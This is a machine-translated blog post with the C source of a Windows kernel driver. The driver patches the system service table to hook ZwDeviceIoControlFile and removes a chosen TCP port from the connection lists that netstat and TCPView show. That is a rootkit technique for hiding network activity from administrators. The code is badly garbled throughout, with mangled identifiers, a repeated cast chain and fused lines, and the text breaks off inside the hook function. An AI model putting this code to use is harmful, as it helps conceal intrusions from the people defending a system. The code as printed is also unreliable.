Netstat and other port-listing tools, such as fport or Sysinternals TCPView, call the API in iphlpapi.dll to enumerate ports. The API in iphlpapi.dll ultimately uses ZwDeviceIoControlFile, sending IOCTL_TCP_QUERY_INFORMATION_EX to the \Device\Tcp device object to obtain the various pieces of information. So one only has to hook the corresponding system service, do some processing on the result, and strip out the port information that should not appear. The real problem, however, is that IOCTL_TCP_QUERY_INFORMATION_EX, the port-related structure definitions and the meaning of the parameters are (mostly) not public; nobody knows them, that is, they are undocumented. Undocumented?? Ring 3 debugging — I'm done for. Ring 0 debugging — I'm done for. Windows drivers — I'm done for. The Windows system — I'm done for. I'm afraid of who I am. Undocumented?? Cool, it's undocumented.
By debugging in ring 3 and analysing how iphlpapi.dll uses the parameters related to IOCTL_TCP_QUERY_INFORMATION_EX, combined with some of the information in MSDN, the structures you need become easy to understand. I used my own AWX to build a VC driver project and wrote the hook part.
As for the solution used in this example: how it behaves under the various Windows versions I don't know — there are many places where it may differ. I first saw this method in the source code of the book "Undocumented Windows".
Here is the source code. It is very simple, so I won't say anything more.
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name:
JIURL_TCPIOCTL.H
About:
- This driver is created by an AppWizard I wrote. [Homepage]
http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
Comments:
All content in this document is currently undisclosed, and I analyze it, it is a key content hidden port.
Undocunted ?? Cool! It is undocumented.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
// jiuml // ipsnmpinfo structure definition is based on RFC 2011
// jiurl // So I define structural tcpsnmpinfo according to RFC 2022, imitate Ipsnmpinfo
// jiurl // Remove some definitions of some extensions through some analysis
// TCP statistics record as laid out by the author (the comment above says it
// was modelled on the IP SNMP info structure). The field names follow the
// TCP-MIB objects; the last three are this implementation's extras. The two
// "Unknown" slots have no confirmed meaning on this page - treat them as
// reserved rather than as data to interpret.
// NOTE(review): presumably the record returned for TCP_MIB_STATS_ID; the hook
// on this page never queries it, so the layout is unverified here.
Typedef struct tcpsnmpinfo {
Ulong TCPSI_RTOALGORITHM;    // one of the tcprtoalgorithm_* values defined below
Ulong TCPSI_RTomin;
Ulong TCPSI_RTOMAX;
Ulong TCPSI_MaxConn;
Ulong TCPSI_ActiveOpens;
Ulong tcpsi_passiveopens;
Ulong TCPSI_ATTEMPTFAILS;
Ulong TCPSI_ESTABRESETS;
Ulong TCPSI_CurrestAb;
Ulong TCPSI_INSEGS;
Ulong TCPSI_OUTSEGS;
Ulong TCPSI_Retranssegs;
Ulong TCPSI_Unknown1;        // meaning not established on this page
Ulong TCPSI_Unknown2;        // meaning not established on this page
Ulong TCPSI_NUMCONN;
} Tcpsnmpinfo;
// Retransmission-timeout algorithm identifiers (values of the TCP-MIB
// tcpRtoAlgorithm object).
#define tcprtoalgorithm_other 1 // none of the folowing
#define tcprtoalgorithm_constant 2 // a constant RTO
#define tcprtoalgorithm_rsre 3 // Mil-STD-1778, Appendix B
#define tcprtoalgorithm_vanj 4 // Van Jacobson's Algorithm
// Object ids (toi_id) a query may carry: the statistics record, the
// connection table, and the connection table extended with the owning PID.
// The hook matches on the two table ids to decide whether to rewrite a reply.
#define TCP_MIB_STATS_ID 1
#define TCP_MIB_ADDRTABLE_ENTRY_ID 0X101
#DEFINE TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0X102
// One row of the connection table returned for TCP_MIB_ADDRTABLE_ENTRY_ID.
// The hook applies ntohs() to tae_connlocalport before comparing it, so the
// port fields are stored in network byte order.
Typedef struct tcpaddrentry {
Ulong Tae_ConnState;           // one of the tcpconnstate_* values below
Ulong Tae_Connlocaladdress;
Ulong Tae_ConnlocalPort;       // network byte order
Ulong Tae_ConnRemAddress;
Ulong Tae_ConnRemport;         // network byte order
} Tcpaddrentry;
// Connection states (TCP-MIB tcpConnState values 1..11, plus 12 for a TCB
// being deleted).
#define tconnstate_closed 1
#define TcpConnState_Listen 2
#define tcpConnState_synsent 3
#define tcpConnState_synreceived 4
#define tcpConnState_ESTABLISHED 5
#define tcpConnState_finwait1 6
// NOTE(review): the next line carries two directives fused by extraction
// (finwait2 = 7 and closewait = 8); they were separate lines originally.
#define tconnstate_finwait2 7 # define tcpconnstate_closewait 8
#define TCPConnState_lastack 9
#define tcpconnstate_closing 10
#define tcpConnState_timeWait 11
#define tcpconnstate_deletetcb 12
// Row of the extended connection table (TCP_MIB_ADDRTABLE_ENTRY_EX_ID): the
// same fields as tcpaddrentry followed by the owning process id. The hook
// sizes the output by sizeof this struct when it filters the extended reply.
Typedef struct tcpaddrexentry {
Ulong Tae_ConnState;
Ulong Tae_Connlocaladdress;
Ulong Tae_ConnlocalPort;       // network byte order, as in tcpaddrentry
Ulong Tae_ConnRemAddress;
Ulong Tae_ConnRemport;
Ulong PID;                     // owning process id
} Tcpaddrexentry;
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name:
JIURLPORTHIDE.H
About:
- This driver is created by an AppWizard I wrote.
[Homepage]
http://jiurl.yeah.net
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
// TCP port this sample removes from query replies (139 = NetBIOS session).
#define porthide 139
// Driver-side view of the kernel's service descriptor table entry. It is
// packed because it is overlaid directly on the exported descriptor.
// NOTE(review): the second member's line is extraction-damaged - a field
// declaration appears to have been swallowed into the comment, so fewer
// members survive here than the real descriptor has. Verify the layout
// against the DDK before relying on any offset.
#pragma pack (1)
Typedef struct service {
Unsigned Int * ServiceTableBase;   // array of system-service entry points, indexed by service number
Unsigned int * service; // buy online in check builduiGned int numberofServices;
Unsigned char * paramtablebase;
} ServicesDescriptAblentry_t, * pserviceDescriptableentRY_T;
#pragma pack ()
// The kernel-exported descriptor that DriverEntry and DriverUnload patch in
// place. Exposure of this symbol is what makes the table writable from a
// driver on the 32-bit kernels this targets; it is also what SSDT integrity
// checks compare against.
__Declspec (DLLIMPORT) ServiceDescriptAblentry_t keserviceDescriptable;
// Declaration of the native service being hooked, a function-pointer type
// for the saved original, the global holding it, and the driver's own
// routines. The hook keeps the native signature so callers see no change.
// NOTE(review): the three parameter lists below lack the opening parenthesis
// after the function name - an extraction artifact, not the original text.
NTSYSAPI
NTSTATUS
NTAPI
ZwdeviceIocontrolfile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
// Pointer type used to call the saved original entry from the hook.
Typedef NTSTATUS (* ZwdeviceiocontrolFile)
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
// Original service-table entry, captured in DriverEntry and restored in
// DriverUnload. Global, unsynchronised state shared by every caller.
Zwdeviceiocontrolfile OldzwdeviceIocontrolfile;
Void Driverunload (in PDRIVER_Object DriverObject);
NTSTATUS
Driverdispatch (in PDevice_Object DeviceObject, In PIRP IRP);
// Replacement entry installed into the service table; same signature as the
// native service.
NTSTATUS NewzwdeviceioControlFile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
);
// jiurl // from addrconv.cpp
// Byte-swap a 16-bit value so network-order ports from the table can be
// compared with a host-order constant (porthide).
// NOTE(review): the line continuations print as "/" and the argument is
// written both (S) and (s) - extraction damage; as printed this macro does
// not expand correctly.
#define ntohs (s) /
((((S) >> 8) & 0x00FF) | /
(((s) << 8) & 0xff00)))
// jiurl // from tcpioctl.h tdiinfo.h Tdistat.h
// The only control code the hook inspects; every other code is passed
// straight through to the original service.
#define ioctl_tcp_query_information_ex 0x00120003 // * Structure of an entry ID.
// TDI entity identifier: which protocol entity (e.g. CO_TL_ENTITY for the
// connection-oriented transport) and which instance of it is addressed.
Typedef struct tdientityId {
Ulong Tei_ENTITY;
Ulong tei_INSTANCE;
} TdientityID;
// * Structure of an Object ID.
// Object identifier at the head of the query input buffer. The hook compares
// exactly sizeof(TDIObjectID) bytes of the caller's InputBuffer against the
// entity/class/type/id it is interested in, so only this prefix decides
// whether a reply is rewritten.
Typedef struct tdiobjectid {
TDIENTITYID TOI_ENTITY;
Ulong toi_class;     // info_class_* value
Ulong toi_type;      // info_type_* value
Ulong TOI_ID;        // TCP_MIB_* object id
} TDIOBJECTID;
#define context_size 16
//
// queryinformationEx ioctl. The return buffer is passed as the outputbuffer
// in The Deviceiocontrol Request. This Structure is Passed as The
// InputBuffer.
//
// The context area carries state between successive requests; the hook does
// not look at it, only at the leading object id.
Struct TCP_REQUEST_QUERY_INFORMATION_EX {
TDIOBJECTID ID; // Object id to query.
Ulong_ptr context [context_size / sizeof (ulong_ptr)]; // multi-request context. Zeroed
// for the first request.
}
TYPEDEF STRUCT TCP_REQUEST_QUERY_INFORMATION_EX
TCP_REQUEST_QUERY_INFORMATION_EX,
* PTCP_Request_Query_information_ex;
// Entity/class/type values the hook fills in before comparing against the
// caller's object id.
// NOTE(review): spelled CO_TL_ENTINTY here but CO_TL_ENTITY where it is used
// in the hook - one of the two is an extraction error.
#define CO_TL_ENTINTY 0X400
#define info_class_protocol 0x200
#define info_type_provider 0x100
#if 0 / / =============================================== ===================
Copyright (c) JIURL, All Rights Reserved
============================================================================================================================================================================================================= ======================
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
Module Name: jiumlporthide.cpp
About:
- This driver is created by an AppWizard I wrote.
[Homepage]
http://jiuml.nease.net/index.htm
~~~~~~~~~~~~~~~~~~~~~
[Email]
Jiurl@mail.china.com
~~~~~~~~~~~~~~~~~~~~
[Forum]
http://jiurl.cosoft.org.cn/forum/index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Customization AppWizard, please contact it.
/ * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * / * /
#ENDIF
#ifdef __cplusplus
EXTERN "C"
{
#ENDIF
#include
#include "jiumlporthide.h"
#include "jiuml_tcpioctl.h"
#ifdef __cplusplus
}
#ENDIF
// Driver entry point (the name is garbled on this page). Installs the
// create/close dispatch and the unload routine, then redirects the service
// table slot for ZwDeviceIoControlFile to NewzwdeviceioControlFile. The
// table is mapped read-only, so the write is bracketed by clearing and
// restoring CR0.WP with inline asm - which also ties this to 32-bit x86.
// Detection/mitigation context: a service-table entry that resolves outside
// the kernel image is the persistent artifact this leaves; SSDT integrity
// checks and, on 64-bit Windows, Kernel Patch Protection target exactly this
// class of modification.
// RegistryPath is not used.
NTSTATUS
Driverence (in PDRIVER_Object DriverObject,
In Punicode_String RegistryPath)
{
DBGPRINT ("JIURLPORTHIDE: Hello, this is driving! / N");
// Minimal create/close handling; Driverunload restores the table.
DriverObject-> majorfunction [IRP_MJ_CREATE] =
DriverObject-> Majorfunction [IRP_MJ_CLOSE] = driverdispatch;
DriverObject-> driverunload = driverunload;
// Save Old System Call Locations
// NOTE(review): the index expression below (and the two table writes here
// and in Driverunload) is extraction-damaged - the cast chain repeats many
// times. What survives is the intent: read the service number embedded in
// the Zw stub and use it as the index into ServiceTableBase. Do not treat
// the text as a literal.
OldzwdeviceioControlFile = (Zwdeviceiocontrolfile) (KeserviceDescriptable.ServentableBase [* (pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]);
// cli masks interrupts on the executing processor only; it is not a
// cross-CPU lock on the table.
_asm
{
CLI / / DISSABLE INTERRUPT
Mov Eax, Cr0 // Move CR0 Register INTO EAX
And Eax, NOT 10000H // Disable WP bit
MOV CR0, EAX / / WRITE Register Back
}
// From this store on, every ZwDeviceIoControlFile call from any process
// enters the hook, which is why the hook passes through anything it does
// not recognise.
(KeserviceDescriptable.ServentAblebase [* (pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]) = (ulong) NewzwdeviceiocontrolFile;
_asm
{
Mov Eax, Cr0 // Move CR0 Register INTO EAX
OR EAX, 1000H // Enable WP Bit
MOV CR0, EAX / / WRITE Register Back
STI // enable interrupt
}
Return status_success;
}
// Create/close handler: completes every IRP with STATUS_SUCCESS and no data,
// so user mode can open and close the device. DeviceObject is not used.
// NOTE(review): the return reads the IRP after IoCompleteRequest has been
// called on it; at that point the IRP is no longer the driver's to touch,
// and drivers normally return the status they set from a local.
// The closing brace fused onto the return line is an extraction artifact.
NTSTATUS
Driverdispatch
In PDEvice_Object DeviceObject,
In PIRP IRP
)
{
IRP-> iostatus.status = status_success;
IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT);
Return IRP-> iostatus.status;}
// Unload routine: writes the entry saved in DriverEntry back into the
// service table using the same CR0.WP sequence, so the table reads as it
// did before the driver loaded. DriverObject is not used.
// NOTE(review): the index expression is extraction-damaged in the same way
// as in DriverEntry; see the note there.
Void Driverunload (in PDRIVER_Object DriverObject)
{
DBGPRINT ("JIURLPORTHIDE: BYE, this is driverunload! / N");
// cli masks interrupts on the executing processor only.
_asm
{
CLI / / DISSABLE INTERRUPT
Mov Eax, Cr0 // Move CR0 Register INTO EAX
And Eax, NOT 10000H // Disable WP bit
MOV CR0, EAX / / WRITE Register Back
}
// Restore the original entry point captured at load time.
(KeserviceDescriptable.ServentAblebase [* (pulong) ((pulong) ((pulong) ((pulong) ((pulong) ((PUCHAR) ZWDEVICEIOCONTROLFILE 1)]) = (ulong) Oldzwdeviceiocontrolfile;
_asm
{
Mov Eax, Cr0 // Move CR0 Register INTO EAX
OR EAX, 1000H // Enable WP Bit
MOV CR0, EAX / / WRITE Register Back
STI // enable interrupt
}
}
NTSTATUS NewzwdeviceioControlFile
In Handle FileHandle,
In Handle Event Optional,
IN PIO_APC_ROUTINE APCROUTINE OPTIONAL,
In Pvoid APCCONText Optional,
OUT PIO_STATUS_BLOCK IOSTATUSBLOCK,
In Ulong IoControlcode,
In Pvoid InputBuffer Optional,
In Ulong InputBufferLength,
Out Pvoid OutputBuffer Optional,
In Ulong OutputBufferlength
)
{
NTSTATUS RC;
Rc = ((zwdeviceiocontrolfile) (OldzwdeviceIocontrolfile) (
FileHandle,
Event,
Apcroutine,
APCCONText,
Iostatusblock,
IOCONTROLCODE,
InputBuffer,
InputBufferlength,
OutputBuffer,
OutputBufferlength
);
IF (IOCONTROLCODE! = IOCTL_TCP_QUERY_INFORMATION_EX)
{
Return (RC);
}
TCP_REQUEST_QUERY_INFORMATION_EX REQ;
TCPAddrentry * TcPTable;
TCPAddrexentry * tcpextable;
Ulong Numconn;
Long i;
DBGPRINT ("JIURLPORTHIDE: IOCTL_TCP_QUERY_INFORMATION_EX / N");
IF (NT_Success (RC))
{
Req.id.toi_entity.tei_entity = CO_TL_ENTITY;
REQ.ID.TOI_ENTITY.TEI_INSTANCE = 0;
REQ.ID.TOI_CLASS = INFO_CLASS_PROTOCOL;
REQ.ID.TOI_TYPE = INFO_TYPE_PROVIDER;
REQ.ID.TOI_ID = TCP_MIB_ADDRTABLE_ENTRY_ID;
IF (! Memcmp (InputBuffer, & Req, Sizeof (TDIObjectID)))
{
Numconn = iostatusblock-> information / sizeof (tcpaddrentry);
TcPtable = (tcpaddrentry *) OutputBuffer;
For (i = 0; i { IF (NTOHS (TCPTable .tae_connlocalport) == porthide) {DBGPRINT ("JIURLPORTHIDE: HIDEPORT% D / N", NTOHS (TCPTable.tae_ConnlocalPort); Memcpy ((TCPTable i), (TCPTable i 1), ((NumConn-i- 1) * sizeof (TCPAddrEntry))); numconn -; i -;}} IoStatusBlock-> Information = numconn * sizeof (TCPAddrEntry); return (rc);} req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID; if (memcmp! (InputBuffer, & req, sizeof (TDIObjectID))) {numconn = IoStatusBlock-> Information / sizeof (TCPAddrExEntry); TcpExTable = (TCPAddrExEntry *) OutputBuffer; for (i = 0; i